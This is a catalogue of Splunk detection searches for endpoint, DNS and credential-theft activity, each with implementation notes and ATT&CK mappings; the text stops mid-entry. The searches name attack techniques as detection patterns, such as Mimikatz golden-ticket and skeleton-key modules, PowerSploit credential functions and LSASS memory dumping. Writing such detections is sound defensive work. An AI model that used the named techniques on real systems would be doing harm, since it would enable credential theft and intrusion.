| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search (process=*-EncodedCommand* OR process=*-enc*) process=*-Exec* | `malicious_powershell_process___multiple_suspicious_command_line_arguments_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

Legitimate process can have this combination of command-line options, but it's not common.

Reference

Test Dataset

version: 6


Monitor dns for brand abuse

This search looks for DNS requests for faux domains similar to the domains that you want to have monitored for abuse.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK:
  • Last Updated: 2017-09-23

Search

| tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time) as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query | `drop_dm_object_name("DNS")` | `security_content_ctime(firstTime)` | `brand_abuse_dns` | `monitor_dns_for_brand_abuse_filter`

Associated Analytic Story


How To Implement

You need to ingest data from your DNS logs. Specifically you must ingest the domain that is being queried and the IP of the host originating the request. Ideally, you should also be ingesting the answer to the query and the query type. This approach allows you to also create your own localized passive DNS capability which can aid you in future investigations. You also need to have run the search "ESCU - DNSTwist Domain Names", which creates the permutations of the domain that will be checked for.

Required field

Kill Chain Phase

  • Delivery
  • Actions on Objectives


Known False Positives

None at this time

Reference

Test Dataset

version: 1


Open redirect in splunk web

This search allows you to look for evidence of exploitation for CVE-2016-4859, the Splunk Open Redirect Vulnerability.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2017-09-19

Search

index=_internal sourcetype=splunk_web_access return_to="/%09/*" | `open_redirect_in_splunk_web_filter`

Associated Analytic Story


How To Implement

No extra steps needed to implement this search.

Required field

Kill Chain Phase

  • Delivery


Known False Positives

None identified

Reference

Test Dataset

version: 1


Osquery pack - coldroot detection

This search looks for ColdRoot events from the osx-attacks osquery pack.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2019-01-29

Search

| from datamodel Alerts.Alerts | search app=osquery:results (name=pack_osx-attacks_OSX_ColdRoot_RAT_Launchd OR name=pack_osx-attacks_OSX_ColdRoot_RAT_Files) | rename columns.path as path | bucket _time span=30s | stats count(path) by _time, host, user, path | `osquery_pack___coldroot_detection_filter`

Associated Analytic Story


How To Implement

In order to properly run this search, Splunk needs to ingest data from your osquery deployed agents with the [osx-attacks.conf](https://github.com/facebook/osquery/blob/experimental/packs/osx-attacks.conf#L599) pack enabled. Also the [TA-OSquery](https://github.com/d1vious/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the osquery data populate the Alerts data model

Required field

Kill Chain Phase

  • Installation
  • Command and Control


Known False Positives

There are no known false positives.

Reference

Test Dataset

version: 1


Processes created by netsh

This search looks for processes launching netsh.exe to execute various commands via the netsh command-line utility. Netsh.exe is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper .dll when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe that are executing commands via the command line. Deprecated because we have another detection of the same type.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1562.004
  • Last Updated: 2020-11-23

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=netsh.exe by Processes.user Processes.dest Processes.parent_process Processes.parent_process_name Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `processes_created_by_netsh_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting logs with the process name, command-line arguments, and parent processes from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1562.004 Disable or Modify System Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It is unusual for netsh.exe to have any child processes in most environments. It makes sense to investigate the child process and verify whether the process spawned is legitimate. We explicitely exclude "C:\Program Files\rempl\sedlauncher.exe" process path since it is a legitimate process by Mircosoft.

Reference

Test Dataset

version: 5


Prohibited software on endpoint

This search looks for applications on the endpoint that you have marked as prohibited.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2019-10-11

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `prohibited_softwares` | `prohibited_software_on_endpoint_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is usually generated via logs that report process tracking in your Windows audit settings. In addition, you must also have only the `process_name` (not the entire process path) marked as "prohibited" in the Enterprise Security `interesting processes` table. To include the process names marked as "prohibited", which is included with ES Content Updates, run the included search Add Prohibited Processes to Enterprise Security.

Required field

Kill Chain Phase

  • Installation
  • Command and Control
  • Actions on Objectives


Known False Positives

None identified

Reference

Test Dataset

version: 2


Reg exe used to hide files directories via registry keys

The search looks for command-line arguments used to hide a file or directory using the reg add command.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1564.001
  • Last Updated: 2019-02-27

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = reg.exe Processes.process="*add*" Processes.process="*Hidden*" Processes.process="*REG_DWORD*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | regex process = "(/d\s+2)" | `reg_exe_used_to_hide_files_directories_via_registry_keys_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1564.001 Hidden Files and Directories Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None at the moment

Reference

Test Dataset

version: 2


Remote registry key modifications

This search monitors for remote modifications to registry keys.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-03-02

Search

| tstats `security_content_summariesonly` count values(Registry.registry_key_name) as registry_key_name values(Registry.registry_path) as registry_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path="\\\\*" by Registry.dest , Registry.user | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `remote_registry_key_modifications_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must populate the `Endpoint` data model. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. Deprecated because I don't think the logic is right.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

This technique may be legitimately used by administrators to modify remote registries, so it's important to filter these events out.

Reference

Test Dataset

version: 3


Remote wmi command attempt

This search looks for wmic.exe being launched with parameters to operate on remote systems.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1047
  • Last Updated: 2018-12-03

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wmic.exe AND Processes.process= */node* by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_wmi_command_attempt_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model. Deprecated because duplicate of Remote Process Instantiation via WMI.

Required field

ATT&CK

ID Technique Tactic
T1047 Windows Management Instrumentation Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators may use this legitimately to gather info from remote systems.

Reference

Test Dataset

version: 2


Scheduled tasks used in badrabbit ransomware

This search looks for flags passed to schtasks.exe on the command-line that indicate that task names related to the execution of Bad Rabbit ransomware were created or deleted. Deprecated because we already have a similar detection

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1053.005
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process) as process from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe (Processes.process= "*create*" OR Processes.process= "*delete*") by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | search (process=*rhaegal* OR process=*drogon* OR *viserion_*) | `scheduled_tasks_used_in_badrabbit_ransomware_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1053.005 Scheduled Task Execution, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

No known false positives

Reference

Test Dataset

version: 3


Splunk enterprise information disclosure

This search allows you to look for evidence of exploitation for CVE-2018-11409, a Splunk Enterprise Information Disclosure Bug.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-06-14

Search

index=_internal sourcetype=splunkd_ui_access server-info | search clientip!=127.0.0.1 uri_path="*raw/services/server/info/server-info" | rename clientip as src_ip, splunk_server as dest | stats earliest(_time) as firstTime, latest(_time) as lastTime, values(uri) as uri, values(useragent) as http_user_agent, values(user) as user by src_ip, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_enterprise_information_disclosure_filter`

Associated Analytic Story


How To Implement

The REST endpoint that exposes system information is also necessary for the proper operation of Splunk clustering and instrumentation. Whitelisting your Splunk systems will reduce false positives.

Required field

Kill Chain Phase

  • Delivery


Known False Positives

Retrieving server information may be a legitimate API request. Verify that the attempt is a valid request for information.

Reference

Test Dataset

version: 1


Suspicious changes to file associations

This search looks for changes to registry values that control Windows file associations, executed by a process that is not typical for legitimate, routine changes to this area.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1546.001
  • Last Updated: 2020-07-22

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name FROM datamodel=Endpoint.Processes where Processes.process_name!=Explorer.exe AND Processes.process_name!=OpenWith.exe by Processes.process_id Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join [ | tstats `security_content_summariesonly` values(Registry.registry_path) as registry_path count FROM datamodel=Endpoint.Registry where Registry.registry_path=*\\Explorer\\FileExts* by Registry.process_id Registry.dest | `drop_dm_object_name("Registry")` | table process_id dest registry_path] | `suspicious_changes_to_file_associations_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on registry changes that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` and `Registry` nodes.

Required field

ATT&CK

ID Technique Tactic
T1546.001 Change Default File Association Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

There may be other processes in your environment that users may legitimately use to modify file associations. If this is the case and you are finding false positives, you can modify the search to add those processes as exceptions.

Reference

Test Dataset

version: 4


Suspicious file write

The search looks for files created with names that have been linked to malicious activity.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2019-04-25

Search

| tstats `security_content_summariesonly` count values(Filesystem.action) as action values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Filesystem)` | `suspicious_writes` | `suspicious_file_write_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file system reads and writes. In addition, this search leverages an included lookup file that contains the names of the files to watch for, as well as a note to communicate why that file name is being monitored. This lookup file can be edited to add or remove file the file names you want to monitor.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible for a legitimate file to be created with the same name as one noted in the lookup file. Filenames listed in the lookup file should be unique enough that collisions are rare. Looking at the location of the file and the process responsible for the activity can help determine whether or not the activity is legitimate.

Reference

Test Dataset

version: 3


Suspicious writes to system volume information

This search detects writes to the 'System Volume Information' folder by something other than the System process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1036
  • Last Updated: 2020-07-22

Search

(`sysmon` OR tag=process) EventCode=11 process_id!=4 file_path=*System\ Volume\ Information* | stats count min(_time) as firstTime max(_time) as lastTime by dest, Image, file_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_writes_to_system_volume_information_filter`

Associated Analytic Story


How To Implement

You need to be ingesting logs with both the process name and command-line from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1036 Masquerading Defense Evasion


Kill Chain Phase

Known False Positives

It is possible that other utilities or system processes may legitimately write to this folder. Investigate and modify the search to include exceptions as appropriate.

Reference

Test Dataset

version: 2


Uncommon processes on endpoint

This search looks for applications on the endpoint that you have marked as uncommon.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1204.002
  • Last Updated: 2020-07-22

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process Processes.process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `uncommon_processes` |`uncommon_processes_on_endpoint_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model. This search uses a lookup file `uncommon_processes_default.csv` to track various features of process names that are usually uncommon in most environments. Please consider updating `uncommon_processes_local.csv` to hunt for processes that are uncommon in your environment.

Required field

ATT&CK

ID Technique Tactic
T1204.002 Malicious File Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified

Reference

Test Dataset

version: 4


Unsigned image loaded by lsass

This search detects loading of unsigned images by LSASS. Deprecated because too noisy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-06

Search

`sysmon` EventID=7 Image=*lsass.exe Signed=false | stats count min(_time) as firstTime max(_time) as lastTime by Computer, Image, ImageLoaded, Signed, SHA1 | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `unsigned_image_loaded_by_lsass_filter`

Associated Analytic Story


How To Implement

This search needs Sysmon Logs with a sysmon configuration, which includes EventCode 7 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Other tools could load images into LSASS for legitimate reason. But enterprise tools should always use signed DLLs.

Reference


Test Dataset

version: 1


Unsuccessful netbackup backups

This search gives you the hosts where a backup was attempted and then failed.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2017-09-12

Search

`netbackup` | stats latest(_time) as latestTime by COMPUTERNAME, MESSAGE | search MESSAGE="An error occurred, failed to backup." | `security_content_ctime(latestTime)` | rename COMPUTERNAME as dest, MESSAGE as signature | table latestTime, dest, signature | `unsuccessful_netbackup_backups_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to obtain data from your backup solution, either from the backup logs on your endpoints or from a central server responsible for performing the backups. If you do not use Netbackup, you can modify this search for your specific backup solution.

Required field

Kill Chain Phase

Known False Positives

None identified

Reference

Test Dataset

version: 1


Windows disableantispyware registry

The search looks for the Registry Key DisableAntiSpyware set to disable. This is consistent with Ryuk infections across a fleet of endpoints.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1562.001
  • Last Updated: 2020-11-06

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_key_name="DisableAntiSpyware" AND Registry.registry_value_name="DWORD (0x00000000)" by Registry.dest Registry.user Registry.registry_path Registry.registry_value_name | `drop_dm_object_name(Registry)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `windows_disableantispyware_registry_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the process-system activity from your hosts to populate the Endpoint Processes data-model object. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1562.001 Disable or Modify Tools Defense Evasion


Kill Chain Phase

  • Delivery


Known False Positives

It is unusual to turn this feature on a Windows system since it is a default security control, although it is not rare for some policies to disable it. Although no false positives have been identified, use the provided filter macro to tune the search.

Reference

Test Dataset

version: 1


Windows connhost exe started forcefully

The search looks for the Console Window Host process (connhost.exe) executed using the force flag -ForceV1. This is not regular behavior in the Windows OS and is often seen executed by the Ryuk Ransomware. DEPRECATED This event is actually seen in the windows 10 client of attack_range_local. After further testing we realized this is not specific to Ryuk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1059.003
  • Last Updated: 2020-11-06

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process="*C:\\Windows\\system32\\conhost.exe* 0xffffffff *-ForceV1*" by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_connhost_exe_started_forcefully_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the process-system activity from your hosts to populate the Endpoint Processes data-model object. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1059.003 Windows Command Shell Execution


Kill Chain Phase

  • Delivery


Known False Positives

This process should not be ran forcefully, we have not see any false positives for this detection

Reference

Test Dataset

version: 1


Windows hosts file modification

The search looks for modifications to the hosts file on all Windows endpoints across your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-11-02

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.file_path Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | search Filesystem.file_name=hosts AND Filesystem.file_path=*Windows\\System32\\* | `drop_dm_object_name(Filesystem)` | `windows_hosts_file_modification_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records the file-system activity from your hosts to populate the Endpoint.Filesystem data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or by other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes.

Required field

Kill Chain Phase

  • Command and Control


Known False Positives

There may be legitimate reasons for system administrators to add entries to this file.

Reference

Test Dataset

version: 1



Endpoint

Access lsass memory for dump creation

Detect memory dumping of the LSASS process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-06

Search

`sysmon` EventCode=10 TargetImage=*lsass.exe CallTrace=*dbgcore.dll* OR CallTrace=*dbghelp.dll* | stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage, TargetProcessId, SourceImage, SourceProcessId | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `access_lsass_memory_for_dump_creation_filter`

Associated Analytic Story


How To Implement

This search requires Sysmon Logs and a Sysmon configuration, which includes EventCode 10 for lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators can create memory dumps for debugging purposes, but memory dumps of the LSASS process would be unusual.

Reference


Test Dataset


version: 2


Applying stolen credentials via mimikatz modules

This detection indicates use of Mimikatz modules that facilitate Pass-the-Token attack, Golden or Silver kerberos ticket attack, and Skeleton key attack.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)kerberos::ptt/)=true OR match_regex(cmd_line, /(?i)kerberos::golden/)=true OR match_regex(cmd_line, /(?i)kerberos::silver/)=true OR match_regex(cmd_line, /(?i)misc::skeleton/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1055 Process Injection Defense Evasion, Privilege Escalation
T1068 Exploitation for Privilege Escalation Privilege Escalation
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence
T1134 Access Token Manipulation Defense Evasion, Privilege Escalation
T1543 Create or Modify System Process Persistence, Privilege Escalation
T1547 Boot or Logon Autostart Execution Persistence, Privilege Escalation
T1548 Abuse Elevation Control Mechanism Defense Evasion, Privilege Escalation
T1554 Compromise Client Software Binary Persistence
T1556 Modify Authentication Process Credential Access, Defense Evasion
T1558 Steal or Forge Kerberos Tickets Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Applying stolen credentials via powersploit modules

Stolen credentials are applied by methods such as user impersonation, credential injection, spoofing of authentication processes or getting hold of critical accounts. This detection indicates such activities carried out by PowerSploit exploit kit APIs.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Invoke-CredentialInjection/)=true OR match_regex(cmd_line, /(?i)Invoke-TokenManipulation/)=true OR match_regex(cmd_line, /(?i)Invoke-UserImpersonation/)=true OR match_regex(cmd_line, /(?i)Get-System/)=true OR match_regex(cmd_line, /(?i)Invoke-RevertToSelf/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1055 Process Injection Defense Evasion, Privilege Escalation
T1068 Exploitation for Privilege Escalation Privilege Escalation
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence
T1134 Access Token Manipulation Defense Evasion, Privilege Escalation
T1543 Create or Modify System Process Persistence, Privilege Escalation
T1547 Boot or Logon Autostart Execution Persistence, Privilege Escalation
T1548 Abuse Elevation Control Mechanism Defense Evasion, Privilege Escalation
T1554 Compromise Client Software Binary Persistence
T1556 Modify Authentication Process Credential Access, Defense Evasion
T1558 Steal or Forge Kerberos Tickets Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Assessment of credential strength via dsinternals modules

This detection identifies use of DSInternals modules that verify password strength, i.e., identify week accounts that would be easily compromised.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Test-PasswordQuality/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence
T1087 Account Discovery Discovery
T1201 Password Policy Discovery Discovery
T1552 Unsecured Credentials Credential Access
T1555 Credentials from Password Stores Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Attempt to add certificate to untrusted store

Attempt to add a certificate to the certificate store

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1553.004
  • Last Updated: 2020-11-03

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=*certutil* (Processes.process=*-addstore*) by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `attempt_to_add_certificate_to_untrusted_store_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1553.004 Install Root Certificate Defense Evasion


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

There may be legitimate reasons for administrators to add a certificate to the untrusted certificate store. In such cases, this will typically be done on a large number of systems.

Reference

Test Dataset


version: 6


Attempt to set default powershell execution policy to unrestricted or bypass

Monitor for changes of the ExecutionPolicy in the registry to the values "unrestricted" or "bypass," which allows the execution of malicious scripts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2020-11-06

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_path=*Software\\Microsoft\\Powershell\\1\\ShellIds\\Microsoft.PowerShell* Registry.registry_key_name=ExecutionPolicy (Registry.registry_value_name=Unrestricted OR Registry.registry_value_name=Bypass) by Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.dest | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `attempt_to_set_default_powershell_execution_policy_to_unrestricted_or_bypass_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Registry node. You must also be ingesting logs with the fields registry_path, registry_key_name, and registry_value_name from your endpoints.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

Administrators may attempt to change the default execution policy on a system for a variety of reasons. However, setting the policy to "unrestricted" or "bypass" as this search is designed to identify, would be unusual. Hits should be reviewed and investigated as appropriate.

Reference

Test Dataset


version: 6


Attempt to stop security service

This search looks for attempts to stop security-related services on the endpoint.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1562.001
  • Last Updated: 2020-07-21

Search

